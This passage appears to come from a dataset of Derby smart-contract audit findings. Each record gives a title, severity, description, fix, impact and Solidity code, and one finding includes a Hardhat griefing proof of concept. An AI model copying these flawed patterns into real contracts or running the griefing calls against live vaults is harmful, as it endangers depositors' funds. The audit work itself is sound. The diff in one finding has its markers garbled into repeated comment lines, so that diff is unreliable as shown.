_slippage: can be anything between 0-10000 because no funds are being transferred\\n _callData // _callData: the encoded calldata to send\\n );\\n }\\n```\\n -Wrong type casting leads to unsigned integer underflow exception when current price is < last priceчhighчWhen the current price of a locked token is lower than the last price, the Vault.storePriceAndRewards will revert because of the wrong integer casting.\\nThe following line appears in Vault.storePriceAndRewards:\\n```\\nint256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n```\\n\\nIf lastPrices[_protocolId] is higher than the 
currentPrice, the solidity compiler will revert due to the underflow of subtracting unsigned integers because it will first try to calculate the result of `currentPrice - lastPrices[_protocolId]` and then try to cast it to int256.чCasting should be performed in the following way to avoid underflow and to allow the priceDiff being negative:\\n```\\nint256 priceDiff = int256(currentPrice) - int256(lastPrices[_protocolId]);\\n```\\nчThe rebalance will fail when the current token price is less than the last one stored.ч```\\nint256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n```\\n -Not all providers claim the rewardsчhighчProviders wrongly assume that the protocols will no longer incentivize users with extra rewards.\\nAmong the current providers only the `CompoundProvider` claims the `COMP` incentives, others leave the claim function empty:\\n```\\n function claim(address _aToken, address _claimer) public override returns (bool) {}\\n```\\nчAdjust the providers to be ready to claim the rewards if necessary.чThe implementations of the providers are based on the current situation.
They are not flexible enough to support the rewards in case the incentives are back.ч```\\n function claim(address _aToken, address _claimer) public override returns (bool) {}\\n```\\n -withdrawal request overrideчmediumчIt is possible that a withdrawal request is overridden during the initial phase.\\nUsers have two options to withdraw: directly or request a withdrawal if not enough funds are available at the moment.\\nWhen making a `withdrawalRequest` it is required that the user has `withdrawalRequestPeriod` not set:\\n```\\n function withdrawalRequest(\\n uint256 _amount\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 value) {\\n UserInfo storage user = userInfo[msg.sender];\\n require(user.withdrawalRequestPeriod == 0, \"Already a request\");\\n\\n value = (_amount * exchangeRate) / (10 ** decimals());\\n\\n _burn(msg.sender, _amount);\\n\\n user.withdrawalAllowance = value;\\n user.withdrawalRequestPeriod = rebalancingPeriod;\\n totalWithdrawalRequests += value;\\n }\\n```\\n\\nThis will misbehave during the initial period when `rebalancingPeriod` is 0. The check will pass, so if invoked multiple times, it will burn users' shares and overwrite the value.чRequire `rebalancingPeriod` != 0 in `withdrawalRequest`, otherwise, force users to directly withdraw.чWhile not very likely to happen, the impact would be huge, because the users who invoke this function several times before the first rebalance, would burn their shares and lose previous `withdrawalAllowance`. 
The protocol should prevent such mistakes.ч```\\n function withdrawalRequest(\\n uint256 _amount\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 value) {\\n UserInfo storage user = userInfo[msg.sender];\\n require(user.withdrawalRequestPeriod == 0, \"Already a request\");\\n\\n value = (_amount * exchangeRate) / (10 ** decimals());\\n\\n _burn(msg.sender, _amount);\\n\\n user.withdrawalAllowance = value;\\n user.withdrawalRequestPeriod = rebalancingPeriod;\\n totalWithdrawalRequests += value;\\n }\\n```\\n -An inactive vault can disrupt rebalancing of active vaultsчmediumчAn inactive vault can send its total underlying amount to the `XChainController` and disrupt rebalancing of active vaults by increasing the `underlyingReceived` counter:\\nif `pushVaultAmounts` is called before `underlyingReceived` overflows, rebalancing of one of the active vault may get stuck since the vault won't receive XChain allocations;\\nif `pushVaultAmounts` after all active vaults and at least one inactive vault has reported their underlying amounts, rebalancing of all vaults will get stuck.\\nRebalancing of vaults starts when Game.pushAllocationsToController is called. The function sends the allocations made by gamers to the `XChainController`. `XChainController` receives them in the receiveAllocationsFromGame function. In the settleCurrentAllocation function, a vault is marked as inactive if it has no allocations and there are no new allocations for the vault. `receiveAllocationsFromGameInt` remembers the number of active vaults.\\nThe next step of the rebalancing process is reporting vault underlying token balances to the `XChainController` by calling MainVault.pushTotalUnderlyingToController. As you can see, the function can be called in an inactive vault (the only modifier of the function, `onlyWhenIdle`, doesn't check that `vaultOff` is false). 
`XChainController` receives underlying balances in the setTotalUnderlying function: notice that the function increases the number of balances it has received.\\nNext step is the XChainController.pushVaultAmounts function, which calculates how much tokens each vault should receive after gamers have changed their allocations. The function can be called only when all active vaults have reported their underlying balances:\\n```\\nmodifier onlyWhenUnderlyingsReceived(uint256 _vaultNumber) {\\n require(\\n vaultStage[_vaultNumber].underlyingReceived == vaultStage[_vaultNumber].activeVaults,\\n \"Not all underlyings received\"\\n );\\n _;\\n}\\n```\\n\\nHowever, as we saw above, inactive vaults can also report their underlying balances and increase the `underlyingReceived` counter-if this is abused mistakenly or intentionally (e.g. by a malicious actor), vaults may end up in a corrupted state. Since all the functions involved in rebalancing are not restricted (including `pushTotalUnderlyingToController` and pushVaultAmounts), a malicious actor can intentionally disrupt accounting of vaults or block a rebalancing.чIn the `MainVault.pushTotalUnderlyingToController` function, consider disallowing inactive vaults (vaults that have `vaultOff` set to true) report their underlying balances.чIf an inactive vault reports its underlying balances instead of an active vault (i.e. `pushVaultAmounts` is called when `underlyingReceived` is equal activeVaults), the active vault will be excluded from rebalancing and it won't receive updated allocations in the current period. Since the rebalancing interval is 2 weeks, the vault will lose the increased yield that might've been generated thanks to new allocations.\\nIf an inactive vault reports its underlying balances in addition to all active vaults (i.e. 
`pushVaultAmounts` is called when `underlyingReceived` is greater than activeVaults), then `pushVaultAmounts` will always revert and rebalancing will get stuck.ч```\\nmodifier onlyWhenUnderlyingsReceived(uint256 _vaultNumber) {\\n require(\\n vaultStage[_vaultNumber].underlyingReceived == vaultStage[_vaultNumber].activeVaults,\\n \"Not all underlyings received\"\\n );\\n _;\\n}\\n```\\n -Rebalancing can be indefinitely blocked due to ever-increasing `totalWithdrawalRequests`, causing locking of funds in vaultsчmediumчRebalancing can get stuck indefinitely at the `pushVaultAmounts` step due to an error in the accounting of `totalWithdrawalRequests`. As a result, funds will be locked in vaults since requested withdrawals are only executed after a next successful rebalance.\\nFunds deposited to underlying protocols can only be withdrawn from vaults after a next successful rebalance:\\na depositor has to make a withdrawal request first, which is tracked in the current rebalance period;\\nrequested funds can be withdrawn in the next rebalance period.\\nThus, it's critical that rebalancing doesn't get stuck during one of its stages.\\nDuring rebalancing, vaults report their balances to `XChainController` via the pushTotalUnderlyingToController function: the functions sends the current unlocked (i.e. excluding reserved funds) underlying token balance of the vault and the total amount of withdrawn requests in the current period. 
The latter amount is stored in the `totalWithdrawalRequests` storage variable:\\nthe variable is increased when a new withdrawal request is made;\\nand it's set to 0 after the vault has been rebalanced-it's value is added to the reserved funds.\\nThe logic of `totalWithdrawalRequests` is that it tracks only the requested withdrawal amounts in the current period-this amount becomes reserved during rebalancing and is added to `reservedFunds` after the vault has been rebalanced.\\nWhen `XChainController` receives underlying balances and withdrawal requests from vaults, it tracks them internally. The amounts then used to calculate how much tokens a vault needs to send or receive after a rebalancing: the total withdrawal amount is subtracted from vault's underlying balance so that it's excluded from the amounts that will be sent to the protocols and so that it could then be added to the reserved funds of the vault.\\nHowever, `totalWithdrawalRequests` in `XChainController` is not reset between rebalancings: when a new rebalancing starts, `XChainController` receives allocations from the Game and calls `resetVaultUnderlying`, which resets the underlying balances receive from vaults in the previous rebalancing. `resetVaultUnderlying` doesn't set `totalWithdrawalRequests` to 0:\\n```\\nfunction resetVaultUnderlying(uint256 _vaultNumber) internal {\\n vaults[_vaultNumber].totalUnderlying = 0;\\n vaultStage[_vaultNumber].underlyingReceived = 0;\\n vaults[_vaultNumber].totalSupply = 0;\\n}\\n```\\n\\nThis cause the value of `totalWithdrawalRequests` to accumulate over time. 
At some point, the total historical amount of all withdrawal requests (which `totalWithdrawalRequests` actually tracks) will be greater than the underlying balance of a vault, and this line will revert due to an underflow in the subtraction:\\n```\\nuint256 totalUnderlying = getTotalUnderlyingVault(_vaultNumber) - totalWithdrawalRequests;\\n```\\nчIn `XChainController.resetVaultUnderlying`, consider setting `vaults[_vaultNumber].totalWithdrawalRequests` to 0. `totalWithdrawalRequests`, like its `MainVault.totalWithdrawalRequests` counterpart, tracks withdrawal requests only in the current period and should be reset to 0 between rebalancings.чDue to accumulation of withdrawal request amounts in the `totalWithdrawalRequests` variable, `XChainController.pushVaultAmounts` can be blocked indefinitely after the value of `totalWithdrawalRequests` has grown bigger than the value of `totalUnderlying` of a vault. Since withdrawals from vaults are delayed and enabled in a next rebalancing period, depositors may not be able to withdraw their funds from vaults, due to a blocked rebalancing.\\nWhile `XChainController` implements a bunch of functions restricted to the guardian that allow the guardian to push a rebalancing through, neither of these functions resets the value of `totalWithdrawalRequests`. If `totalWithdrawalRequests` becomes bigger than `totalUnderlying`, the guardian won't be able to fix the state of `XChainController` and push the rebalancing through.ч```\\nfunction resetVaultUnderlying(uint256 _vaultNumber) internal {\\n vaults[_vaultNumber].totalUnderlying = 0;\\n vaultStage[_vaultNumber].underlyingReceived = 0;\\n vaults[_vaultNumber].totalSupply = 0;\\n}\\n```\\n -`XChainController::sendFundsToVault` can be griefed and leave `XChainController` in a bad stateчmediumчA user can grief the send funds to vault state transition by calling `sendFundsToVault` multiple times with the same vault.\\nDuring rebalancing, some vaults might need funds sent to them. 
They will be in state `WaitingForFunds`. To transition from here any user can trigger `XChainController` to send them funds by calling `sendFundsToVault`.\\nThis is trigger per chain and will transfer funds from `XChainController` to the respective vaults on each chain.\\nAt the end, when the vaults on each chain are processed and either have gotten funds sent to them or didn't need to `sendFundsToVaults` will trigger the state for this `vaultNumber` to be reset.\\nHowever, when transferring funds, there's never any check that this chain has not already been processed. So any user could simply call this function for a vault that either has no funds to transfer or where there's enough funds in `XChainController` and trigger the state reset for the vault.\\nPoC in `xChaincontroller.test.ts`, run after 4.5) Trigger vaults to transfer funds to xChainController:\\n```\\n it('5) Grief xChainController send funds to vaults', async function () {\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n\\n expect(await xChainController.getFundsReceivedState(vaultNumber)).to.be.equal(0);\\n\\n expect(await vault3.state()).to.be.equal(3);\\n\\n // can't trigger state change anymore\\n await expect(xChainController.sendFundsToVault(vaultNumber, slippage, 1000, relayerFee, {value: parseEther('0.1'),})).to.be.revertedWith('Not all funds received');\\n });\\n```\\nчIssue `XChainController::sendFundsToVault` can be griefed and leave `XChainController` in a bad state\\nI recommend the protocol either keeps track of which vaults have been sent funds in `XChainController`.\\nor changes so a vault can only receive funds when waiting for them:\\n```\\ndiff // Remove the line 
below\\n// Remove the line below\\ngit a/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol b/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\nindex 8739e24..d475ee6 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\n@@ // Remove the line below\\n328,7 // Add the line below\\n328,7 @@ contract MainVault is Vault, VaultToken {\\n /// @notice Step 5 end; Push funds from xChainController to vaults\\n /// @notice Receiving feedback from xController when funds are received, so the vault can rebalance\\n function receiveFunds() external onlyXProvider {\\n// Remove the line below\\n if (state != State.WaitingForFunds) return;\\n// Add the line below\\n require(state == State.WaitingForFunds,stateError);\\n settleReservedFunds();\\n }\\n \\n```\\nчXChainController ends up out of sync with the vault(s) that were supposed to receive funds.\\n`guardian` can resolve this by resetting the states using admin functions but these functions can still be frontrun by a malicious user.\\nUntil this is resolved the rebalancing of the impacted vaults cannot continue.ч```\\n it('5) Grief xChainController send funds to vaults', async function () {\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n\\n expect(await 
xChainController.getFundsReceivedState(vaultNumber)).to.be.equal(0);\\n\\n expect(await vault3.state()).to.be.equal(3);\\n\\n // can't trigger state change anymore\\n await expect(xChainController.sendFundsToVault(vaultNumber, slippage, 1000, relayerFee, {value: parseEther('0.1'),})).to.be.revertedWith('Not all funds received');\\n });\\n```\\n -Vault could `rebalance()` before funds arrive from xChainControllerчmediumчInvoke sendFundsToVault() to Push funds from xChainController to vaults. which is call xTransferToVaults()\\nFor the cross-chain rebalancing `xTransferToVaults()` will execute this logic\\n```\\n // rest of code\\n pushFeedbackToVault(_chainId, _vault, _relayerFee);\\n xTransfer(_asset, _amount, _vault, _chainId, _slippage, _relayerFee);\\n // rest of code\\n```\\n\\n`pushFeedbackToVault()` Is to invoke receiveFunds() `pushFeedbackToVault()` always travel through the slow path\\n`xTransfer()` to transfer funds from one chain to another If fast liquidity is not available, the `xTransfer()` will go through the slow path.\\nThe vulnerability is if the `xcall()` of `pushFeedbackToVault()` excited successfully before `xTransfer()` transfer the funds to the vault, anyone can invoke rebalance() this will lead to rebalancing Vaults with Imperfect funds (this could be true only if funds that are expected to be received from XChainController are greater than `reservedFunds` and `liquidityPerc` together )\\nThe above scenario could be done in two possible cases 1- `xTransfer()` will go through the slow path but because High Slippage the cross-chain message will wait until slippage conditions improve (relayers will continuously re-attempt the transfer execution).\\n2- Connext Team says\\n```\\nAll messages are added to a Merkle root which is sent across chains every 30 mins\\nAnd then those messages are executed by off-chain actors called routers\\n\\nso it is indeed possible that messages are received out of order (and potentially with increased latency in 
between due to batch times) \\nFor \"fast path\" (unauthenticated) messages, latency is not a concern, but ordering may still be (this is an artifact of the chain itself too btw)\\none thing you can do is add a nonce to your messages so that you can yourself order them at destination\\n```\\n\\nso `pushFeedbackToVault()` and `xTransfer()` could be added to a different Merkle root and this will lead to executing `receiveFunds()` before funds arrive.чCheck if funds are arrived or notчThe vault could `rebalance()` before funds arrive from xChainController, this will reduce rewardsч```\\n // rest of code\\n pushFeedbackToVault(_chainId, _vault, _relayerFee);\\n xTransfer(_asset, _amount, _vault, _chainId, _slippage, _relayerFee);\\n // rest of code\\n```\\n -Wrong calculation of `balanceBefore` and `balanceAfter` in deposit methodчmediumчDeposit method calculate net amount transferred from user. It use `reservedFunds` also in consideration when calculating `balanceBefore` and `balanceAfter` but it is not actually require.\\n```\\n uint256 balanceBefore = getVaultBalance() - reservedFunds;\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance() - reservedFunds;\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\n\\nDeposit may fail when `reservedFunds` is greater than `getVaultBalance()`чUse below code. 
This is correct way of finding net amount transfer by depositor\\n```\\n uint256 balanceBefore = getVaultBalance();\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance();\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\nчDeposit may fail when `reservedFunds` is greater than `getVaultBalance()`ч```\\n uint256 balanceBefore = getVaultBalance() - reservedFunds;\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance() - reservedFunds;\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\n -Malicious users could set allocations to a blacklist Protocol and break the rebalancing logicчmediumч`game.sol` pushes `deltaAllocations` to vaults by pushAllocationsToVaults() and it deletes all the value of the `deltas`\\n```\\nvaults[_vaultNumber].deltaAllocationProtocol[_chainId][i] = 0;\\n```\\n\\nMalicious users could set allocations to a blacklist Protocol. If only one of the `Baskets` has a non-zero value to a Protocol on blacklist receiveProtocolAllocations() will revert `receiveProtocolAllocations().receiveProtocolAllocationsInt().setDeltaAllocationsInt()`\\n```\\n function setDeltaAllocationsInt(uint256 _protocolNum, int256 _allocation) internal {\\n require(!controller.getProtocolBlacklist(vaultNumber, _protocolNum), \"Protocol on blacklist\");\\n deltaAllocations[_protocolNum] += _allocation;\\n deltaAllocatedTokens += _allocation;\\n }\\n```\\n\\nand You won't be able to execute rebalance()чYou should check if the Protocol on the blacklist when Game players `rebalanceBasket()`чThe guardian isn't able to restart the protocol manually. `game.sol` loses the value of the `deltas`. 
The whole system is down.ч```\\nvaults[_vaultNumber].deltaAllocationProtocol[_chainId][i] = 0;\\n```\\n -Asking for `balanceOf()` in the wrong addressчmediumчon sendFundsToVault() this logic\\n```\\naddress underlying = getUnderlyingAddress(_vaultNumber, _chain);\\nuint256 balance = IERC20(underlying).balanceOf(address(this));\\n```\\n\\nin case `_chainId` is Optimism the `underlying` address is for Optimism (L2) but `XChainController` is on Mainnet you can't invoke `balanceOf()` like this!!!чIssue Asking for `balanceOf()` in the wrong address\\n`getUnderlyingAddress(_vaultNumber, _chain);` should just be `getUnderlyingAddress(_vaultNumber);` so the `underlying` here\\n```\\nuint256 balance = IERC20(underlying).balanceOf(address(this));\\n```\\n\\nwill always be on the MainnetчAsking for `balanceOf()` in the wrong address The protocol will not be able to rebalance the vaultч```\\naddress underlying = getUnderlyingAddress(_vaultNumber, _chain);\\nuint256 balance = IERC20(underlying).balanceOf(address(this));\\n```\\n -`getDecimals()` always calls the MainNetчmediumч`XChainController.pushVaultAmounts()` is to push `exchangeRate` to the vaults. `XChainController.getVaultAddress()` returns the vault address of `vaultNumber` with the given `chainID`\\n`pushVaultAmounts()` invokes `xProvider.getDecimals()` internally to calculate `newExchangeRate`\\nThe xProvider.getDecimals() always calls the `address(vault)` from the MainNet. but `address(vault)` could be in any chain `XChainController.pushVaultAmounts()` could keep reverting with all the `chainID` (only the MainNet will be correct ) or it will return the wrong `decimals` values. (if the `address(vault)` is for other chain/L but it exists in the MainNet with a decimals())\\nthis will lead to a wrong `newExchangeRate`\\n```\\nuint256 newExchangeRate = (totalUnderlying * (10 ** decimals)) / totalSupply;\\n```\\nчYou should invoke `getVaultAddress()` with `_chain` of the Mainnet. 
because all vaults have the same getDecimals (not all vaultNamber)ч`pushVaultAmounts()` will keep reverting and this will break all rebalancing logicч```\\nuint256 newExchangeRate = (totalUnderlying * (10 ** decimals)) / totalSupply;\\n```\\n -User should not receive rewards for the rebalance period, when protocol was blacklisted, because of unpredicted behaviour of protocol priceчmediumчUser should not receive rewards for the rebalance period, when protocol was blacklisted, because of unpredicted behaviour of protocol price.\\nWhen user allocates derby tokens to some underlying protocol, he receive rewards according to the exchange price of that protocols token. This reward can be positive or negative. Rewards of protocol are set to `Game` contract inside `settleRewards` function and they are accumulated for user, once he calls `rebalanceBasket`.\\n```\\n function storePriceAndRewards(uint256 _totalUnderlying, uint256 _protocolId) internal {\\n uint256 currentPrice = price(_protocolId);\\n if (lastPrices[_protocolId] == 0) {\\n lastPrices[_protocolId] = currentPrice;\\n return;\\n }\\n\\n\\n int256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n int256 nominator = (int256(_totalUnderlying * performanceFee) * priceDiff);\\n int256 totalAllocatedTokensRounded = totalAllocatedTokens / 1E18;\\n int256 denominator = totalAllocatedTokensRounded * int256(lastPrices[_protocolId]) * 100; // * 100 cause perfFee is in percentages\\n\\n\\n if (totalAllocatedTokensRounded == 0) {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = 0;\\n } else {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = nominator / denominator;\\n }\\n\\n\\n lastPrices[_protocolId] = currentPrice;\\n }\\n```\\n\\nEvery time, previous price of protocol is compared with current price.\\nIn case if some protocol is hacked, there is `Vault.blacklistProtocol` function, that should withdraw reserves from protocol and mark it as blacklisted. 
The problem is that because of the hack it's not possible to determine what will happen with exhange rate of protocol. It can be 0, ot it can be very small or it can be high for any reasons. But protocol still accrues rewards per token for protocol, even that it is blacklisted. Because of that, user that allocated to that protocol can face with accruing very big negative or positive rewards. Both this cases are bad.\\nSo i believe that in case if protocol is blacklisted, it's better to set rewards as 0 for it.\\nExample. 1.User allocated 100 derby tokens for protocol A 2.Before `Vault.rebalance` call, protocol A was hacked which made it exchangeRate to be not real. 3.Derby team has blacklisted that protocol A. 4.Vault.rebalance is called which used new(incorrect) exchangeRate of protocol A in order to calculate `rewardPerLockedToken` 5.When user calls rebalance basket next time, his rewards are accumulated with extremely high/low value.чIssue User should not receive rewards for the rebalance period, when protocol was blacklisted, because of unpredicted behaviour of protocol price\\nIn case if protocol is blacklisted, then set `rewardPerLockedToken` to 0 inside `storePriceAndRewards` function.чUser's rewards calculation is unpredictable.ч```\\n function storePriceAndRewards(uint256 _totalUnderlying, uint256 _protocolId) internal {\\n uint256 currentPrice = price(_protocolId);\\n if (lastPrices[_protocolId] == 0) {\\n lastPrices[_protocolId] = currentPrice;\\n return;\\n }\\n\\n\\n int256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n int256 nominator = (int256(_totalUnderlying * performanceFee) * priceDiff);\\n int256 totalAllocatedTokensRounded = totalAllocatedTokens / 1E18;\\n int256 denominator = totalAllocatedTokensRounded * int256(lastPrices[_protocolId]) * 100; // * 100 cause perfFee is in percentages\\n\\n\\n if (totalAllocatedTokensRounded == 0) {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = 0;\\n } else {\\n 
rewardPerLockedToken[rebalancingPeriod][_protocolId] = nominator / denominator;\\n }\\n\\n\\n lastPrices[_protocolId] = currentPrice;\\n }\\n```\\n -The protocol could not handle multiple vaults correctlyчmediumчThe protocol needs to handle multiple vaults correctly. If there are three vaults (e.g.USDC, USDT, DAI) the protocol needs to rebalance them all without any problems\\nThe protocol needs to invoke pushAllocationsToController() every `rebalanceInterval` to push totalDeltaAllocations from Game to xChainController.\\n`pushAllocationsToController()` invoke `rebalanceNeeded()` to check if a rebalance is needed based on the set interval and it uses the state variable `lastTimeStamp` to do the calculations\\n```\\n function rebalanceNeeded() public view returns (bool) {\\n return (block.timestamp - lastTimeStamp) > rebalanceInterval || msg.sender == guardian;\\n }\\n```\\n\\nBut in the first invoking (for USDC vault) of `pushAllocationsToController()` it will update the state variable `lastTimeStamp` to the current `block.timestamp`\\n```\\nlastTimeStamp = block.timestamp;\\n```\\n\\nNow when you invoke (for DAI vault) `pushAllocationsToController()`. 
It will revert because of\\n```\\nrequire(rebalanceNeeded(), \"No rebalance needed\");\\n```\\n\\nSo if the protocol has two vaults or more (USDC, USDT, DAI) you can only do one rebalance every `rebalanceInterval`чKeep tracking the `lastTimeStamp` for every `_vaultNumber` by using an arrayчThe protocol could not handle multiple vaults correctly\\nBoth Users and Game players will lose funds because the MainVault will not rebalance the protocols at the right time with the right valuesч```\\n function rebalanceNeeded() public view returns (bool) {\\n return (block.timestamp - lastTimeStamp) > rebalanceInterval || msg.sender == guardian;\\n }\\n```\\n -Vault.blacklistProtocol can revert in emergencyчmediumчVault.blacklistProtocol can revert in emergency, because it tries to withdraw underlying balance from protocol, which can revert for many reasons after it's hacked or paused.\\n```\\n function blacklistProtocol(uint256 _protocolNum) external onlyGuardian {\\n uint256 balanceProtocol = balanceUnderlying(_protocolNum);\\n currentAllocations[_protocolNum] = 0;\\n controller.setProtocolBlacklist(vaultNumber, _protocolNum);\\n savedTotalUnderlying -= balanceProtocol;\\n withdrawFromProtocol(_protocolNum, balanceProtocol);\\n }\\n```\\n\\nThe problem is that this function is trying to withdraw all balance from protocol. This can create problems as in case of hack, attacker can steal funds, pause protocol and any other things that can make `withdrawFromProtocol` function to revert. Because of that it will not be possible to add the protocol to the blacklist and as a result the system will stop working correctly.чProvide `needToWithdraw` param to the `blacklistProtocol` function. In case if it's safe to withdraw, then withdraw, otherwise, just set protocol as blacklisted. Also you can call function with `true` param again, once it's safe to withdraw. 
Example of hack situation flow: 1.underlying vault is hacked 2.you call setProtocolBlacklist(\"vault\", false) which blacklists vault 3.in next tx you call setProtocolBlacklist(\"vault\", true) and tries to withdrawчHacked or paused protocol can't be set to blacklist.ч```\\n function blacklistProtocol(uint256 _protocolNum) external onlyGuardian {\\n uint256 balanceProtocol = balanceUnderlying(_protocolNum);\\n currentAllocations[_protocolNum] = 0;\\n controller.setProtocolBlacklist(vaultNumber, _protocolNum);\\n savedTotalUnderlying -= balanceProtocol;\\n withdrawFromProtocol(_protocolNum, balanceProtocol);\\n }\\n```\\n -Game doesn't accrued rewards for previous rebalance period in case if rebalanceBasket is called in next periodчmediumчGame doesn't accrued rewards for previous rebalance period in case if `rebalanceBasket` is called in next period. Because of that user do not receive rewards for the previous period and in case if he calls `rebalanceBasket` each rebalance period, he will receive rewards only for last one.\\n```\\n function addToTotalRewards(uint256 _basketId) internal onlyBasketOwner(_basketId) {\\n if (baskets[_basketId].nrOfAllocatedTokens == 0) return;\\n\\n\\n uint256 vaultNum = baskets[_basketId].vaultNumber;\\n uint256 currentRebalancingPeriod = vaults[vaultNum].rebalancingPeriod;\\n uint256 lastRebalancingPeriod = baskets[_basketId].lastRebalancingPeriod;\\n\\n\\n if (currentRebalancingPeriod <= lastRebalancingPeriod) return;\\n\\n\\n for (uint k = 0; k < chainIds.length; k++) {\\n uint32 chain = chainIds[k];\\n uint256 latestProtocol = latestProtocolId[chain];\\n for (uint i = 0; i < latestProtocol; i++) {\\n int256 allocation = basketAllocationInProtocol(_basketId, chain, i) / 1E18;\\n if (allocation == 0) continue;\\n\\n\\n int256 lastRebalanceReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n lastRebalancingPeriod,\\n i\\n );\\n int256 currentReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n 
currentRebalancingPeriod,\\n i\\n );\\n baskets[_basketId].totalUnRedeemedRewards +=\\n (currentReward - lastRebalanceReward) *\\n allocation;\\n }\\n }\\n }\\n```\\n\\nThis function allows user to accrue rewards only when currentRebalancingPeriod > `lastRebalancingPeriod`. When user allocates, he allocates for the next period. And `lastRebalancingPeriod` is changed after `addToTotalRewards` is called, so after rewards for previous period accrued. And when allocations are sent to the xController, then new rebalance period is started. So actually rewards accruing for period that user allocated for is started once `pushAllocationsToController` is called. And at this point currentRebalancingPeriod == `lastRebalancingPeriod` which means that if user will call rebalanceBasket for next period, the rewards will not be accrued for him, but `lastRebalancingPeriod` will be incremented. So actually he will not receive rewards for previous period.\\nExample. 1.currentRebalancingPeriod is 10. 2.user calls `rebalanceBasket` with new allocation and `lastRebalancingPeriod` is set to 11 for him. 3.pushAllocationsToController is called, so `currentRebalancingPeriod` becomes 11. 4.settleRewards is called, so rewards for the 11th cycle are accrued. 5.now user can call `rebalanceBasket` for the next 12th cycle. `addToTotalRewards` is called, but `currentRebalancingPeriod == `lastRebalancingPeriod` == 11`, so rewards were not accrued for 11th cycle 6.new allocations is saved and `lastRebalancingPeriod` becomes 12. 7.the loop continues and every time when user allocates for next rewards his `lastRebalancingPeriod` is increased, but rewards are not added. 8.user will receive his rewards for previous cycle, only if he skip 1 rebalance period(he doesn't allocate on that period).\\nAs you can see this is very serious bug. 
Because of that, player that wants to adjust his allocation every rebalance period will loose all his rewards.чFirst of all, you need to allows to call `rebalanceBasket` only once per rebalance period, before new rebalancing period started and allocations are sent to xController. Then you need to change check inside `addToTotalRewards` to this `if (currentRebalancingPeriod < lastRebalancingPeriod) return;` in order to allow accruing for same period.чPlayer looses all his rewardsч```\\n function addToTotalRewards(uint256 _basketId) internal onlyBasketOwner(_basketId) {\\n if (baskets[_basketId].nrOfAllocatedTokens == 0) return;\\n\\n\\n uint256 vaultNum = baskets[_basketId].vaultNumber;\\n uint256 currentRebalancingPeriod = vaults[vaultNum].rebalancingPeriod;\\n uint256 lastRebalancingPeriod = baskets[_basketId].lastRebalancingPeriod;\\n\\n\\n if (currentRebalancingPeriod <= lastRebalancingPeriod) return;\\n\\n\\n for (uint k = 0; k < chainIds.length; k++) {\\n uint32 chain = chainIds[k];\\n uint256 latestProtocol = latestProtocolId[chain];\\n for (uint i = 0; i < latestProtocol; i++) {\\n int256 allocation = basketAllocationInProtocol(_basketId, chain, i) / 1E18;\\n if (allocation == 0) continue;\\n\\n\\n int256 lastRebalanceReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n lastRebalancingPeriod,\\n i\\n );\\n int256 currentReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n currentRebalancingPeriod,\\n i\\n );\\n baskets[_basketId].totalUnRedeemedRewards +=\\n (currentReward - lastRebalanceReward) *\\n allocation;\\n }\\n }\\n }\\n```\\n -MainVault.rebalanceXChain doesn't check that savedTotalUnderlying >= reservedFundsчmediumчMainVault.rebalanceXChain doesn't check that savedTotalUnderlying >= reservedAmount. Because of that, shortage can occur, if vault will lose some underlying during cross chain calls and reservedFundswill not be present in the vault.\\n`reservedFunds` is the amount that is reserved to be withdrawn by users. 
It's increased by `totalWithdrawalRequests` amount every cycle, when `setXChainAllocation` is called.\\n`setXChainAllocation` call is initiated by xController. This call provides vault with information about funds. In case if vault should send funds to the xController, then `SendingFundsXChain` state is set, aslo amount to send is stored.\\n```\\n function rebalanceXChain(uint256 _slippage, uint256 _relayerFee) external payable {\\n require(state == State.SendingFundsXChain, stateError);\\n\\n\\n if (amountToSendXChain > getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n\\n\\n vaultCurrency.safeIncreaseAllowance(xProvider, amountToSendXChain);\\n IXProvider(xProvider).xTransferToController{value: msg.value}(\\n vaultNumber,\\n amountToSendXChain,\\n address(vaultCurrency),\\n _slippage,\\n _relayerFee\\n );\\n\\n\\n emit RebalanceXChain(vaultNumber, amountToSendXChain, address(vaultCurrency));\\n\\n\\n amountToSendXChain = 0;\\n settleReservedFunds();\\n }\\n```\\n\\nAs you can see, function just pulls needed funds from providers if needed and sends them to 